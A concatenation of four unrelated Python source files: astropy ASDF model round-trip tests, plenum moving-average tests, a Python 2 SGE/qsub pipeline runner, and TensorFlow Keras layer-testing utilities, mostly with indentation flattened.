f'astropy.modeling.projections.Sky2Pix_{name}')(),
'backward': util.resolve_name(
f'astropy.modeling.projections.Pix2Sky_{name}')()
}
with warnings.catch_warnings():
# Some schema files are missing from asdf<=2.4.2 which causes warnings
if Version(asdf.__version__) <= Version('2.5.1'):
warnings.filterwarnings('ignore', 'Unable to locate schema file')
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_tabular_model(tmpdir):
points = np.arange(0, 5)
values = [1., 10, 2, 45, -3]
model = astmodels.Tabular1D(points=points, lookup_table=values)
tree = {'model': model}
helpers.assert_roundtrip_tree(tree, tmpdir)
table = np.array([[3., 0., 0.],
[0., 2., 0.],
[0., 0., 0.]])
points = ([1, 2, 3], [1, 2, 3])
model2 = astmodels.Tabular2D(points, lookup_table=table, bounds_error=False,
fill_value=None, method='nearest')
tree = {'model': model2}
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_bounding_box(tmpdir):
model = astmodels.Shift(1) & astmodels.Shift(2)
model.bounding_box = ((1, 3), (2, 4))
tree = {'model': model}
helpers.assert_roundtrip_tree(tree, tmpdir)
@pytest.mark.parametrize("standard_version", asdf.versioning.supported_versions)
def test_const1d(tmpdir, standard_version):
helpers.assert_roundtrip_tree(
{"model": astmodels.Const1D(amplitude=5.)},
tmpdir,
init_options={"version": standard_version}
)
@pytest.mark.parametrize("standard_version", asdf.versioning.supported_versions)
@pytest.mark.parametrize("model", [
astmodels.Polynomial1D(1, c0=5, c1=17),
astmodels.Polynomial1D(1, c0=5, c1=17, domain=[-5, 4], window=[-2, 3]),
astmodels.Polynomial2D(2, c0_0=3, c1_0=5, c0_1=7),
astmodels.Polynomial2D(
2, c0_0=3, c1_0=5, c0_1=7, x_domain=[-2, 2], y_domain=[-4, 4],
x_window=[-6, 6], y_window=[-8, 8]
),
])
def test_polynomial(tmpdir, standard_version, model):
helpers.assert_roundtrip_tree({"model": model}, tmpdir, init_options={"version": standard_version})
def test_domain_orthopoly(tmpdir):
model1d = astmodels.Chebyshev1D(2, c0=2, c1=3, c2=0.5, domain=[-2, 2])
model2d = astmodels.Chebyshev2D(1, 1, c0_0=1, c0_1=2, c1_0=3,
x_domain=[-2, 2], y_domain=[-2, 2])
fa = AsdfFile()
fa.tree['model1d'] = model1d
fa.tree['model2d'] = model2d
file_path = str(tmpdir.join('orthopoly_domain.asdf'))
fa.write_to(file_path)
with asdf.open(file_path) as f:
assert f.tree['model1d'](1.8) == model1d(1.8)
assert f.tree['model2d'](1.8, -1.5) == model2d(1.8, -1.5)
def test_window_orthopoly(tmpdir):
model1d = astmodels.Chebyshev1D(2, c0=2, c1=3, c2=0.5,
domain=[-2, 2], window=[-0.5, 0.5])
model2d = astmodels.Chebyshev2D(1, 1, c0_0=1, c0_1=2, c1_0=3,
x_domain=[-2, 2], y_domain=[-2, 2],
x_window=[-0.5, 0.5], y_window=[-0.1, 0.5])
fa = AsdfFile()
fa.tree['model1d'] = model1d
fa.tree['model2d'] = model2d
file_path = str(tmpdir.join('orthopoly_window.asdf'))
fa.write_to(file_path)
with asdf.open(file_path) as f:
assert f.tree['model1d'](1.8) == model1d(1.8)
assert f.tree['model2d'](1.8, -1.5) == model2d(1.8, -1.5)
def test_linear1d(tmpdir):
model = astmodels.Linear1D()
tree = {'model': model}
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_linear1d_quantity(tmpdir):
model = astmodels.Linear1D(1*u.nm, 1*(u.nm/u.pixel))
tree = {'model': model}
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_tabular_model_units(tmpdir):
points = np.arange(0, 5) * u.pix
values = [1., 10, 2, 45, -3] * u.nm
model = astmodels.Tabular1D(points=points, lookup_table=values)
tree = {'model': model}
helpers.assert_roundtrip_tree(tree, tmpdir)
table = np.array([[3., 0., 0.],
[0., 2., 0.],
[0., 0., 0.]]) * u.nm
points = ([1, 2, 3], [1, 2, 3]) * u.pix
model2 = astmodels.Tabular2D(points, lookup_table=table,
bounds_error=False, fill_value=None,
method='nearest')
tree = {'model': model2}
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_fix_inputs(tmpdir):
with warnings.catch_warnings():
# Some schema files are missing from asdf<=2.4.2 which causes warnings
if Version(asdf.__version__) <= Version('2.5.1'):
warnings.filterwarnings('ignore', 'Unable to locate schema file')
model0 = astmodels.Pix2Sky_TAN()
model0.input_units_equivalencies = {'x': u.dimensionless_angles(),
'y': u.dimensionless_angles()}
model1 = astmodels.Rotation2D()
model = model0 | model1
tree = {
'compound': fix_inputs(model, {'x': 45}),
'compound1': fix_inputs(model, {0: 45})
}
helpers.assert_roundtrip_tree(tree, tmpdir)
def test_fix_inputs_type(tmpdir):
with pytest.raises(TypeError):
tree = {
'compound': fix_inputs(3, {'x': 45})
}
helpers.assert_roundtrip_tree(tree, tmpdir)
with pytest.raises(AttributeError):
tree = {
'compound': astmodels.Pix2Sky_TAN() & {'x': 45}
}
helpers.assert_roundtrip_tree(tree, tmpdir)
comp_model = custom_and_analytical_inverse()
@pytest.mark.parametrize(('model'), [astmodels.Shift(1) & astmodels.Shift(2) | comp_model,
comp_model | astmodels.Shift(1) & astmodels.Shift(2),
astmodels.Shift(1) & comp_model,
comp_model & astmodels.Shift(1)
])
def test_custom_and_analytical(model, tmpdir):
fa = AsdfFile()
fa.tree['model'] = model
file_path = str(tmpdir.join('custom_and_analytical_inverse.asdf'))
fa.write_to(file_path)
with asdf.open(file_path) as f:
assert f.tree['model'].inverse is not None
def test_deserialize_compound_user_inverse(tmpdir):
"""
Confirm that we are able to correctly reconstruct a
compound model with a user inverse set on one of its
component models.
Due to code in TransformType that facilitates circular
inverses, the user inverse of the component model is
not available at the time that the CompoundModel is
constructed.
"""
yaml = """
model: !transform/concatenate-1.2.0
forward:
- !transform/shift-1.2.0
inverse: !transform/shift-1.2.0 {offset: 5.0}
offset: -10.0
- !transform/shift-1.2.0 {offset: -20.0}
"""
buff = helpers.yaml_to_asdf(yaml)
with asdf.open(buff) as af:
model = af["model"]
assert model.has_inverse()
assert model.inverse(-5, -20) == (0, 0)
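def test_shift_roundtrip_plain_asdf(tmpdir):
    """
    Minimal sketch of the round trip that assert_roundtrip_tree automates:
    write a tree containing a model with the plain asdf API, read it back,
    and check that the deserialized model evaluates identically.
    """
    model = astmodels.Shift(7.5)
    file_path = str(tmpdir.join('shift.asdf'))
    AsdfFile({'model': model}).write_to(file_path)
    with asdf.open(file_path) as f:
        assert f.tree['model'](1.0) == model(1.0)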
# test some models and compound models with some input unit equivalencies
def models_with_input_eq():
# 1D model
m1 = astmodels.Shift(1*u.kg)
m1.input_units_equivalencies = {'x': u.mass_energy()}
# 2D model
m2 = astmodels.Const2D(10*u.Hz)
m2.input_units_equivalencies = {'x': u.dimensionless_angles(),
'y': u.dimensionless_angles()}
# 2D model with only one input equivalencies
m3 = astmodels.Const2D(10*u.Hz)
m3.input_units_equivalencies = {'x': u.dimensionless_angles()}
# model using equivalency that has args using units
m4 = astmodels.PowerLaw1D(amplitude=1*u.m, x_0=10*u.pix, alpha=7)
m4.input_units_equivalencies = {'x': u.equivalencies.pixel_scale(0.5*u.arcsec/u.pix)}
    return [m1, m2, m3, m4]
def compound_models_with_input_eq():
m1 = astmodels.Gaussian1D(10*u.K, 11*u.arcsec, 12*u.arcsec)
m1.input_units_equivalencies = {'x': u.parallax()}
m2 = astmodels.Gaussian1D(5*u.s, 2*u.K, 3*u.K)
m2.input_units_equivalencies = {'x': u.temperature()}
return [m1|m2, m1&m2, m1+m2]
test_models.extend(models_with_input_eq())
test_models.extend(compound_models_with_input_eq())
|
|
import math
from typing import Optional
import pytest
from plenum.common.moving_average import MovingAverage, ExponentialMovingAverage, EventFrequencyEstimator, \
EMAEventFrequencyEstimator
START_TIME = 10
STEP = 3
class MockMovingAverage(MovingAverage):
def __init__(self):
self.updates = []
self.reset_called = False
self._value = 0
def update(self, value: float):
self.updates.append(value)
self._value = value
def reset(self, value: float = 0.0):
self.reset_called = True
self._value = 0
@property
def value(self) -> float:
return self._value
@pytest.fixture(params=[ExponentialMovingAverage])
def ma_type(request):
return request.param
@pytest.fixture()
def mock_averager():
return MockMovingAverage()
@pytest.fixture()
def estimator(mock_averager):
return EventFrequencyEstimator(start_time=START_TIME, window=STEP, averager=mock_averager)
def create_moving_average(cls, start: float) -> Optional[MovingAverage]:
if cls == ExponentialMovingAverage:
return cls(alpha=0.5, start=start)
return None
def test_moving_average_has_initial_value_after_creation(ma_type):
start = 4.2
ma = create_moving_average(ma_type, start)
assert ma.value == start
def test_moving_average_doesnt_change_value_when_fed_same_values(ma_type):
start = 4.2
ma = create_moving_average(ma_type, start)
for _ in range(10):
ma.update(start)
assert ma.value == start
def test_moving_average_has_value_semantics_for_eq(ma_type):
start = 4.2
ma1 = create_moving_average(ma_type, start)
ma2 = create_moving_average(ma_type, start)
assert ma1 == ma2
ma1.update(42)
assert ma1 != ma2
ma2.update(42)
assert ma1 == ma2
def test_moving_average_resets_to_same_state_as_new(ma_type):
ma = create_moving_average(ma_type, 1.3)
for _ in range(10):
ma.update(42)
start = 4.2
ma.reset(start)
assert ma == create_moving_average(ma_type, start)
def test_moving_average_increases_value_when_updated_with_larger_value(ma_type):
start = 4.2
target = 42
ma = create_moving_average(ma_type, start)
for _ in range(10):
last = ma.value
ma.update(target)
assert ma.value > last
assert ma.value < target
def test_moving_average_decreases_value_when_updated_with_smaller_value(ma_type):
start = 4.2
target = -42
ma = create_moving_average(ma_type, start)
for _ in range(10):
last = ma.value
ma.update(target)
assert ma.value < last
assert ma.value > target
def test_moving_average_changes_faster_with_larger_difference_to_target(ma_type):
ma1 = create_moving_average(ma_type, 10.0)
ma2 = create_moving_average(ma_type, 20.0)
for _ in range(10):
last1 = ma1.value
last2 = ma2.value
ma1.update(18.0)
ma2.update(22.0)
assert ma1.value - last1 > ma2.value - last2
def test_exp_moving_average_converges_faster_with_larger_alpha():
start = 4.2
target = 42
ma1 = ExponentialMovingAverage(0.2, start)
ma2 = ExponentialMovingAverage(0.8, start)
for _ in range(10):
ma1.update(target)
ma2.update(target)
assert ma1.value < ma2.value
def test_exp_moving_average_moves_halfway_to_target_in_desired_number_of_steps():
steps = 10
alpha = ExponentialMovingAverage.halfway_alpha(steps)
start = 4.2
target = 42
halfway = 0.5 * (start + target)
ma = ExponentialMovingAverage(alpha, start)
for i in range(steps - 1):
ma.update(target)
assert ma.value < halfway
ma.update(target)
assert ma.value > halfway
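# Reference sketch (not part of the plenum API): a conventional exponential
# moving average updates as value <- alpha * sample + (1 - alpha) * value, so
# after n updates toward a fixed target the remaining gap shrinks by a factor
# of (1 - alpha) ** n. Choosing alpha = 1 - 0.5 ** (1 / n) therefore halves the
# gap in n steps, which is the behaviour halfway_alpha is expected to provide.
def test_reference_ema_update_halves_gap_in_requested_steps():
    steps = 10
    alpha = 1.0 - 0.5 ** (1.0 / steps)
    start, target = 4.2, 42.0
    value = start
    for _ in range(steps):
        value = alpha * target + (1.0 - alpha) * value
    assert math.isclose(value, 0.5 * (start + target), rel_tol=1e-9)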
def test_event_frequency_estimator_is_initialized_to_zero(mock_averager, estimator):
assert estimator.value == 0
assert mock_averager.updates == []
def test_event_frequency_estimator_updates_with_time_even_if_there_are_no_events(mock_averager, estimator):
estimator.update_time(START_TIME + 3.1 * STEP)
assert estimator.value == 0
assert mock_averager.updates == [0, 0, 0]
def test_event_frequency_estimator_doesnt_update_when_time_doesnt_advance_enough(mock_averager, estimator):
estimator.add_events(3)
estimator.update_time(START_TIME + 0.9 * STEP)
assert estimator.value == 0
assert mock_averager.updates == []
def test_event_frequency_estimator_sums_all_events_in_same_window(mock_averager, estimator):
estimator.add_events(3)
estimator.update_time(START_TIME + 0.3 * STEP)
estimator.add_events(4)
estimator.update_time(START_TIME + 1.2 * STEP)
estimator.add_events(2)
assert estimator.value == 7 / STEP
assert mock_averager.updates == [7 / STEP]
def test_event_frequency_estimator_doesnt_spread_events_between_windows(mock_averager, estimator):
estimator.add_events(3)
estimator.update_time(START_TIME + 0.3 * STEP)
estimator.add_events(4)
estimator.update_time(START_TIME + 2.2 * STEP)
estimator.add_events(2)
assert estimator.value == 0
assert mock_averager.updates == [7 / STEP, 0]
def test_event_frequency_estimator_resets_everything(mock_averager, estimator):
estimator.add_events(3)
estimator.update_time(START_TIME + 1.2 * STEP)
estimator.add_events(4)
assert estimator.value == 3 / STEP
assert mock_averager.updates == [3 / STEP]
assert not mock_averager.reset_called
estimator.reset(START_TIME + 3.0 * STEP)
assert estimator.value == 0
assert mock_averager.reset_called
estimator.add_events(2)
estimator.update_time(START_TIME + 4.2 * STEP)
assert estimator.value == 2 / STEP
assert mock_averager.updates == [3 / STEP, 2 / STEP]
@pytest.mark.parametrize("step", [2, 10, 40])
def test_ema_event_frequency_estimator_respects_reaction_time(step):
now = 0.0
half_time = 120.0
estimator = EMAEventFrequencyEstimator(now, half_time)
assert estimator.value == 0
while now < half_time:
estimator.update_time(now)
estimator.add_events(step)
now += step
estimator.update_time(now)
assert math.isclose(estimator.value, 0.5, rel_tol=0.07)
while now < 2.0 * half_time:
estimator.update_time(now)
estimator.add_events(step)
now += step
estimator.update_time(now)
assert math.isclose(estimator.value, 0.75, rel_tol=0.07)
|
|
#!/usr/bin/python
#
import os
import sys
import getopt
import math
import tempfile
import stat
import re
import shlex
import time
import subprocess
from subprocess import Popen
import glob
#import topsort
import topological
from util import get_new_directory
from util import get_new_file
import random
from pypipeline.qsub import get_default_qsub_params, get_qsub_args
def write_script(prefix, script, dir):
    out, script_file = get_new_file(prefix=prefix, suffix=".sh", dir=dir)
out.write(script)
out.write("\n")
out.close()
os.system("chmod u+x '%s'" % (script_file))
return script_file
def get_files_in_dir(dirname):
return [f for f in os.listdir(dirname) if os.path.isfile(os.path.join(dirname, f))]
def create_queue_command(script_file, cwd, name="test", prereqs=[], stdout="stdout", qsub_args=None):
# Make the stdout file and script_file relative paths to cwd if possible.
stdout = os.path.relpath(stdout, cwd)
script_file = os.path.relpath(script_file, cwd)
# Create the qsub command.
queue_command = "qsub "
if qsub_args:
queue_command += " " + qsub_args + " "
else:
#queue_command += " -q cpu.q "
queue_command += " -q mem.q -q himem.q -l vf=15.5G "
queue_command += " -cwd -j y -b y -V -N %s -e stderr -o %s " % (name, stdout)
if len(prereqs) > 0:
queue_command += "-hold_jid %s " % (",".join(prereqs))
queue_command += "\"bash '%s'\"" % (script_file)
return queue_command
unique_num = 0
def get_unique_name(name):
global unique_num
unique_num += 1
return name + str(unique_num)
def get_cd_to_bash_script_parent():
return """
# Change directory to the parent directory of the calling bash script.
SOURCE="${BASH_SOURCE[0]}"
while [ -h "$SOURCE" ]; do # resolve $SOURCE until the file is no longer a symlink
DIR="$( cd -P "$( dirname "$SOURCE" )" && pwd )"
SOURCE="$(readlink "$SOURCE")"
[[ $SOURCE != /* ]] && SOURCE="$DIR/$SOURCE" # if $SOURCE was a relative symlink, we need to resolve it relative to the path where the symlink file was located
done
DIR="$( cd -P "$( dirname "$SOURCE" )" && pwd )"
echo "Changing directory to $DIR"
cd $DIR
"""
def dfs_stages(stage):
stages = set()
stages.add(stage)
#print "stage.name",stage.name
#print "stage.dependents",[x.name for x in stage.dependents]
for dependent in stage.dependents:
for s in dfs_stages(dependent):
if not s in stages:
stages.add(s)
return stages
def bfs_stages(stage):
stages = set()
queue = [stage]
while queue != []:
stage = queue.pop(0)
if not stage in stages:
stages.add(stage)
queue.extend(stage.dependents)
return stages
class Stage:
'''A stage in a pipeline to be run after the stages in prereqs and before the
stages in dependents.
Attributes:
cwd: Current working directory for this stage (Set by PipelineRunner).
serial: True iff this stage will be run in a pipeline using bash, one stage at a time (Set by PipelineRunner).
dry_run: Whether to just do a dry run which will skip the actual running of script in _run_script() (Set by PipelineRunner).
root_dir: Path to root directory for this project (Set by PipelineRunner).
setupenv: Path to setupenv.sh script for setting environment (Set by PipelineRunner).
work_mem_megs: Megabytes required by this stage (Default provided by PipelineRunner).
threads: Number of threads used by this stage (Default provided by PipelineRunner).
minutes: Number of minutes used by this stage (Default provided by PipelineRunner).
qsub_args: The SGE qsub arguments for running the job (Set by PipelineRunner).
qdel_script_file: Path to qdel script for this stage (Set by _run_stage when self.serial is True).
print_to_console: Whether to print stdout/stderr to the console (Set by PipelineRunner).
Private attributes:
prereqs: List of stages that should run before this stage.
dependents: List of stages that should run after this stage.
completion_indicator: Filename to be created upon successful completion.
'''
def __init__(self, completion_indicator="DONE"):
''' If the default completion_indicator is used, it will be created in the cwd for this stage '''
self.completion_indicator = completion_indicator
self.prereqs = []
self.dependents = []
self.cwd = None
self.serial = False
self.root_dir = None
self.setupenv = None
self.work_mem_megs = None
self.threads = None
self.minutes = None
self.qsub_args = None
self.qdel_script_file = None
self.print_to_console = None
# A fixed random number to distinguish this task from
# other runs of this same task within qsub.
self.qsub_rand = random.randint(0, sys.maxint)
def always_relaunch(self):
# We add a non-canonical completion indicator in order to ensure
# that this job will always relaunch.
self.completion_indicator = "DONE_BUT_RELAUNCH"
def add_dependent(self, stage):
stage.prereqs.append(self)
self.dependents.append(stage)
def add_dependents(self, stages):
for stage in stages:
self.add_dependent(stage)
def add_prereq(self, stage):
self.prereqs.append(stage)
stage.dependents.append(self)
def add_prereqs(self, stages):
for stage in stages:
self.add_prereq(stage)
def get_qsub_name(self):
'''Gets the SGE job name.'''
        # Create a more unique name for qsub so that, when there are multiple runs
        # of the same task, the kill script only kills its own job.
qsub_name = "%s_%x" % (self.get_name(), self.qsub_rand)
# If qsub name does not begin with a letter, add an "a"
        matcher = re.compile('^[a-zA-Z]').search(qsub_name)
if not matcher:
qsub_name = 'a'+qsub_name
return qsub_name
def run_stage(self, exp_dir):
self.exp_dir = exp_dir
os.chdir(exp_dir)
if self._is_already_completed():
print "Skipping completed stage: name=" + self.get_name() + " completion_indicator=" + self.completion_indicator
return
self._run_stage(exp_dir)
def _run_stage(self, exp_dir):
        ''' Overridden by GridShardRunnerStage '''
# TODO: This should create another script that calls the experiment
# script, not modify it.
#
# ulimit doesn't work on Mac OS X or the COE (wisp). So we don't use it anymore.
# script += "ulimit -v %d\n" % (1024 * self.work_mem_megs)
# script += "\n"
script = ""
# Always change directory to the current location of this experiment script.
script += get_cd_to_bash_script_parent()
# Source the setupenv.sh script.
script += "source %s\n\n" % (self.setupenv)
# Add the execution.
script += self.create_stage_script(exp_dir)
# Touch a file to indicate successful completion.
script += "\ntouch '%s'\n" % (self.completion_indicator)
script_file = write_script("experiment-script", script, exp_dir)
self._run_script(script_file, exp_dir)
def __str__(self):
return self.get_name()
def _is_already_completed(self):
if not os.path.exists(self.completion_indicator):
return False
for prereq in self.prereqs:
if not prereq._is_already_completed():
return False
return True
def _run_script(self, script_file, cwd, stdout_filename="stdout"):
stdout_path = os.path.join(cwd, stdout_filename)
os.chdir(cwd)
assert(os.path.exists(script_file))
if self.serial:
command = "bash %s" % (script_file)
print self.get_name(),":",command
if self.dry_run: return
stdout = open(stdout_path, 'w')
if not self.print_to_console:
# Print stdout only to a file.
p = Popen(args=shlex.split(command), cwd=cwd, stderr=subprocess.STDOUT, stdout=stdout)
retcode = p.wait()
else:
# Print out stdout to the console and to the file.
p = Popen(args=shlex.split(command), cwd=cwd, stderr=subprocess.STDOUT, stdout=subprocess.PIPE)
for line in iter(p.stdout.readline, ''):
try:
stdout.write(line)
print line,
except:
pass
retcode = p.wait()
stdout.close()
if (retcode != 0):
if not self.print_to_console:
# Print out the last few lines of the failed stage's stdout file.
os.system("tail -n 15 %s" % (stdout_path))
raise subprocess.CalledProcessError(retcode, command)
#Old way: subprocess.check_call(shlex.split(command))
else:
prereq_names = [prereq.get_qsub_name() for prereq in self.prereqs]
qsub_script = ""
qsub_script += get_cd_to_bash_script_parent() + "\n"
qsub_cmd = create_queue_command(script_file, cwd, self.get_qsub_name(), prereq_names, stdout_path, self.qsub_args)
qsub_script += qsub_cmd
qsub_script_file = write_script("qsub-script", qsub_script, cwd)
print qsub_cmd
if self.dry_run: return
subprocess.check_call(shlex.split("bash %s" % (qsub_script_file)))
qdel_script = "qdel %s" % (self.get_qsub_name())
self.qdel_script_file = write_script("qdel-script", qdel_script, cwd)
def create_stage_script(self, exp_dir):
''' Override this method '''
return None
def get_name(self):
'''Override this method.
Gets display name of this stage and stage directory name.
'''
return None
class NamedStage(Stage):
def __init__(self, name, completion_indicator="DONE"):
Stage.__init__(self, completion_indicator)
self._name = str(name) #TODO: is this the best way to handle name's type?
def get_name(self):
return self._name
class ScriptStringStage(NamedStage):
def __init__(self, name, script, completion_indicator="DONE"):
NamedStage.__init__(self, name, completion_indicator)
self.script = script
def create_stage_script(self, exp_dir):
return self.script
class RootStage(NamedStage):
def __init__(self):
NamedStage.__init__(self, "root_stage")
def run_stage(self, exp_dir):
# Intentionally a no-op
pass
class PipelineRunner:
def __init__(self,name="experiments", queue=None, print_to_console=False, dry_run=False, rolling=False):
self.name = name
        self.serial = (queue is None)
self.root_dir = os.path.abspath(".")
self.setupenv = os.path.abspath("./setupenv.sh")
if not os.path.exists(self.setupenv):
print "ERROR: File not found:", self.setupenv
print "ERROR: The file setupenv.sh must be located in the current working directory"
sys.exit(1)
self.print_to_console = print_to_console
self.rolling = rolling
self.dry_run = dry_run
# Setup arguments for qsub
self.queue = queue
(threads, work_mem_megs, minutes) = get_default_qsub_params(queue)
self.threads = threads
self.work_mem_megs = work_mem_megs
self.minutes = minutes
def run_pipeline(self, root_stage):
self._check_stages(root_stage)
top_dir = os.path.join(self.root_dir, "exp")
if self.rolling:
exp_dir = os.path.join(top_dir, self.name)
os.system("rm -r %s" % (exp_dir))
# TODO: add support for rolling directories
else:
exp_dir = get_new_directory(prefix=self.name, dir=top_dir)
os.chdir(exp_dir)
for stage in self.get_stages_as_list(root_stage):
if isinstance(stage, RootStage):
continue
cwd = os.path.join(exp_dir, str(stage.get_name()))
os.mkdir(cwd)
self._update_stage(stage, cwd)
stage.run_stage(cwd)
if not self.serial:
# Create a global qdel script
global_qdel = ""
for stage in self.get_stages_as_list(root_stage):
if isinstance(stage, RootStage):
continue
global_qdel += "bash %s\n" % (stage.qdel_script_file)
write_script("global-qdel-script", global_qdel, exp_dir)
def _update_stage(self, stage, cwd):
'''Set some additional parameters on the stage.'''
stage.cwd = cwd
stage.serial = self.serial
stage.dry_run = self.dry_run
stage.root_dir = self.root_dir
stage.setupenv = self.setupenv
# Use defaults for threads, work_mem_megs, and minutes if they are not
# set on the stage.
if stage.threads is None:
stage.threads = self.threads
if stage.work_mem_megs is None:
stage.work_mem_megs = self.work_mem_megs
if stage.minutes is None:
stage.minutes = self.minutes
if stage.print_to_console is None:
stage.print_to_console = self.print_to_console
# Get the stage's qsub args.
stage.qsub_args = get_qsub_args(self.queue, stage.threads, stage.work_mem_megs, stage.minutes)
def _check_stages(self, root_stage):
all_stages = self.get_stages_as_list(root_stage)
names = set()
for stage in all_stages:
if stage.get_name() in names:
print "ERROR: All stage names:\n" + "\n".join([s.get_name() for s in all_stages])
print "ERROR: Multiple stages have the same name: " + stage.get_name()
print "ERROR: Num copies:", len([x for x in all_stages if x.get_name() == stage.get_name()])
assert stage.get_name() not in names, "ERROR: Multiple stages have the same name: " + stage.get_name()
names.add(stage.get_name())
print "All stages:"
for stage in all_stages:
print "\t",stage.get_name()
print "Number of stages:", len(all_stages)
def get_stages_as_list(self, root_stage):
return topological.bfs_topo_sort(root_stage)
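# Illustrative sketch (not run automatically): wiring two stages into a serial
# pipeline. Assumes a setupenv.sh exists in the current working directory, as
# PipelineRunner requires.
def example_pipeline():
    tokenize = ScriptStringStage("tokenize", "echo tokenizing > tokens.txt")
    train = ScriptStringStage("train", "cat tokens.txt")
    tokenize.add_dependent(train)
    root = RootStage()
    root.add_dependent(tokenize)
    # queue=None runs each stage locally with bash instead of submitting via qsub.
    runner = PipelineRunner(name="demo", queue=None)
    runner.run_pipeline(root)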
if __name__ == '__main__':
print "This script is not to be run directly"
|
|
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Utilities for unit-testing Keras."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import threading
import numpy as np
from tensorflow.python import keras
from tensorflow.python.eager import context
from tensorflow.python.framework import tensor_shape
from tensorflow.python.keras.optimizer_v2 import adadelta as adadelta_v2
from tensorflow.python.keras.optimizer_v2 import adagrad as adagrad_v2
from tensorflow.python.keras.optimizer_v2 import adam as adam_v2
from tensorflow.python.keras.optimizer_v2 import adamax as adamax_v2
from tensorflow.python.keras.optimizer_v2 import gradient_descent as gradient_descent_v2
from tensorflow.python.keras.optimizer_v2 import nadam as nadam_v2
from tensorflow.python.keras.optimizer_v2 import rmsprop as rmsprop_v2
from tensorflow.python.util import tf_contextlib
from tensorflow.python.util import tf_inspect
def get_test_data(train_samples,
test_samples,
input_shape,
num_classes,
random_seed=None):
"""Generates test data to train a model on.
Arguments:
train_samples: Integer, how many training samples to generate.
test_samples: Integer, how many test samples to generate.
input_shape: Tuple of integers, shape of the inputs.
num_classes: Integer, number of classes for the data and targets.
random_seed: Integer, random seed used by numpy to generate data.
Returns:
A tuple of Numpy arrays: `(x_train, y_train), (x_test, y_test)`.
"""
if random_seed is not None:
np.random.seed(random_seed)
num_sample = train_samples + test_samples
templates = 2 * num_classes * np.random.random((num_classes,) + input_shape)
y = np.random.randint(0, num_classes, size=(num_sample,))
x = np.zeros((num_sample,) + input_shape, dtype=np.float32)
for i in range(num_sample):
x[i] = templates[y[i]] + np.random.normal(loc=0, scale=1., size=input_shape)
return ((x[:train_samples], y[:train_samples]),
(x[train_samples:], y[train_samples:]))
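# Illustrative usage (values are arbitrary): a tiny, reproducible classification
# dataset for smoke tests.
def _example_get_test_data():
  (x_train, y_train), (x_test, y_test) = get_test_data(
      train_samples=20,
      test_samples=5,
      input_shape=(8,),
      num_classes=3,
      random_seed=1337)
  return x_train.shape, y_train.shape, x_test.shape, y_test.shape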
def layer_test(layer_cls, kwargs=None, input_shape=None, input_dtype=None,
input_data=None, expected_output=None,
expected_output_dtype=None):
"""Test routine for a layer with a single input and single output.
Arguments:
layer_cls: Layer class object.
kwargs: Optional dictionary of keyword arguments for instantiating the
layer.
input_shape: Input shape tuple.
input_dtype: Data type of the input data.
input_data: Numpy array of input data.
    expected_output: Numpy array of the expected output data.
expected_output_dtype: Data type expected for the output.
Returns:
The output data (Numpy array) returned by the layer, for additional
checks to be done by the calling code.
Raises:
ValueError: if `input_shape is None`.
"""
if input_data is None:
if input_shape is None:
raise ValueError('input_shape is None')
if not input_dtype:
input_dtype = 'float32'
input_data_shape = list(input_shape)
for i, e in enumerate(input_data_shape):
if e is None:
input_data_shape[i] = np.random.randint(1, 4)
input_data = 10 * np.random.random(input_data_shape)
if input_dtype[:5] == 'float':
input_data -= 0.5
input_data = input_data.astype(input_dtype)
elif input_shape is None:
input_shape = input_data.shape
if input_dtype is None:
input_dtype = input_data.dtype
if expected_output_dtype is None:
expected_output_dtype = input_dtype
# instantiation
kwargs = kwargs or {}
layer = layer_cls(**kwargs)
  # test get_weights, set_weights at layer level
  weights = layer.get_weights()
  layer.set_weights(weights)
  # test instantiation from weights
  if 'weights' in tf_inspect.getargspec(layer_cls.__init__).args:
kwargs['weights'] = weights
layer = layer_cls(**kwargs)
# test in functional API
x = keras.layers.Input(shape=input_shape[1:], dtype=input_dtype)
y = layer(x)
if keras.backend.dtype(y) != expected_output_dtype:
raise AssertionError('When testing layer %s, for input %s, found output '
'dtype=%s but expected to find %s.\nFull kwargs: %s' %
(layer_cls.__name__,
x,
keras.backend.dtype(y),
expected_output_dtype,
kwargs))
# check shape inference
model = keras.models.Model(x, y)
expected_output_shape = tuple(
layer.compute_output_shape(
tensor_shape.TensorShape(input_shape)).as_list())
actual_output = model.predict(input_data)
actual_output_shape = actual_output.shape
for expected_dim, actual_dim in zip(expected_output_shape,
actual_output_shape):
if expected_dim is not None:
if expected_dim != actual_dim:
raise AssertionError(
'When testing layer %s, for input %s, found output_shape='
'%s but expected to find %s.\nFull kwargs: %s' %
(layer_cls.__name__,
x,
actual_output_shape,
expected_output_shape,
kwargs))
if expected_output is not None:
np.testing.assert_allclose(actual_output, expected_output, rtol=1e-3)
# test serialization, weight setting at model level
model_config = model.get_config()
recovered_model = keras.models.Model.from_config(model_config)
if model.weights:
weights = model.get_weights()
recovered_model.set_weights(weights)
output = recovered_model.predict(input_data)
np.testing.assert_allclose(output, actual_output, rtol=1e-3)
# test training mode (e.g. useful for dropout tests)
  # Rebuild the model to avoid the graph being reused between predict() and
  # train(). This was causing errors for layers with a Defun as their body.
  # See b/120160788 for more details. This should be mitigated after 2.0.
model = keras.models.Model(x, layer(x))
if _thread_local_data.run_eagerly is not None:
model.compile(
'rmsprop',
'mse',
weighted_metrics=['acc'],
run_eagerly=should_run_eagerly())
else:
model.compile('rmsprop', 'mse', weighted_metrics=['acc'])
model.train_on_batch(input_data, actual_output)
# test as first layer in Sequential API
layer_config = layer.get_config()
layer_config['batch_input_shape'] = input_shape
layer = layer.__class__.from_config(layer_config)
model = keras.models.Sequential()
model.add(layer)
actual_output = model.predict(input_data)
actual_output_shape = actual_output.shape
for expected_dim, actual_dim in zip(expected_output_shape,
actual_output_shape):
if expected_dim is not None:
if expected_dim != actual_dim:
raise AssertionError(
'When testing layer %s **after deserialization**, '
'for input %s, found output_shape='
'%s but expected to find inferred shape %s.\nFull kwargs: %s' %
